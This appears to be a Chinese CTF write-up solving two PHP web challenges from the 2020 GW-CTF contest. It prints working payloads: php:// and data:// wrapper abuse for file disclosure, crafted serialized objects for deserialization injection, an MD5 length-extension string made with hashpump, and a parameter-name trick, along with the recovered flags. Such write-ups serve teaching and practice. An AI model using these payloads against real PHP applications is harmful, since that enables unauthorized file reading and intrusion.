第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7

  • 第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7已关闭评论
  • 7 views
  • A+
所属分类:CTF专场

EasyPhp

 <?php  
$sz_txt = $_GET["sz_txt"];
$sz_file = $_GET["sz_file"];
$password = $_GET["password"];
if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
    echo "<br><h1>".file_get_contents($sz_txt,'r')."</h1></br>";
    if(preg_match("/flag/",$sz_file)){
        echo "Not now!";
        exit(); 
    }else{
        include($sz_file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 

$sz_txt使用data://或者php://input伪协议,接着$sz_file使用php://filter伪协议读取源码即可

?sz_txt=data:text/plain,welcome to jxsz&sz_file=php://filter/read=convert.base64-encode/resource=useless.php
  • 1

第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7
第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7
base64解码得到useless.php源码

<?php  
class Flag{  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("So cool,continue plz");
        }  
    }  
}  
?>  

构造反序列化poc,直接修改属性$file为读取源码的文件名即可

<?php  
class Flag{  
    public $file = "flag.php";  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("So cool,continue plz");
        }  
    }  
}  

$res = new Flag();
echo serialize($res);
?> 
PS C:UsersAdministratorDesktop> php .test.php
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

 

抓POST包,修改GET参数:?sz_txt=php://input&sz_file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

POST内容为:welcome to jxsz

第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7

flag{4a5a802f-6a37-44d4-8a49-e9066dfd6474}
  • 1

parseHash

 <?php 
include("key.php");
class person{ 
    public $aa; 
    public $bb; 
    public $username; 
    public $password; 
    public function __construct($key=''){ 
        $this->username="jxsz";
        $this->password="jxsz";
        if(strlen($key)==16&&md5($key . urldecode( $this->username .  $this->password)=="a1133ca71ed6320a0255b0d53188be57")){
            echo "Welcome";
        }  
    } 

    public function __destruct(){ 
        $this->aa = (string)$this->aa; 
        if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){ 
            die("no no no"); 
        } 
        if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){ 
            echo file_get_contents("/flag"); 
        } 
    } 
} 
highlight_file(__FILE__); 
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
    echo "66666666666";
    unserialize($_GET['sz_sz.sz']);
} 
  • 1

国赛原题easytrick改的,这里考查的是hash拓展攻击 + php非法表单名传参 + php浮点数高精度绕过

hash拓展攻击

$this->username = "jxsz"
$this->password = "jxsz"
strlen($key)==16
md5($key.urldecode($this->username.$this->password)) = "a1133ca71ed6320a0255b0d53188be57"
strlen($key) + strlen("jxsz") = 20
最后一个条件: 传入字符串中需要有“szxy666”字符,并且不能放在开头

使用hash拓展攻击工具hashpump直接生成

hashpump工具地址:https://github.com/bwall/HashPump

第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7

ec789edf786174babd157da5492e1850
jxszx80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xc0x00x00x00x00x00x00x00szxy666
  • 1
  • 2

x00替换为%00传入即可,成功绕过执行到输出66666666666

pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=ec789edf786174babd157da5492e1850
  • 1

第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7
反序列化的GET参数名中含有非法字符.

unserialize($_GET['sz_sz.sz']); 
  • 1

这里根据php对非法传参名的处理机制:https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified

可发现处理进制中对传参名中出现非法字符.只替换一次
第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7
那么针对这里题目的变量名sz_sz.sz为了防止.被替换_,利用只替换一次的处理进制,传入参数名改为sz[sz.sz即可
第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7

?sz[sz.sz=
  • 1

接下来就是国赛的题目easytrick的做法,只不过这里过滤了NANINF的绕过方法,但是还是可以使用浮点数高精度绕过,序列化poc如下:

<?php 
class person{ 
    public $aa; 
    public $bb;
 }
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>
PS C:UsersAdministratorDesktop> php .test.php
O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}

payload

?sz[sz.sz=O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
  • 1

第一届赣网杯网络安全大赛 2020GW-CTF Web_Writeup_末初 · mochu7

flag{4a1a802f-6b37-44c4-8b49-e9066ddd6474}
  • 1

相关推荐: CTFSHOW之WEB入门1000题

web1 右键查看源代码就出来了 1ctfshow{e79b78ff-0134-4bd5-8427-5df9b427ba51} web2这题无法通过右键查看源代码,我们在输入view-source://url flag就出来了 1ctfshow{b76468e…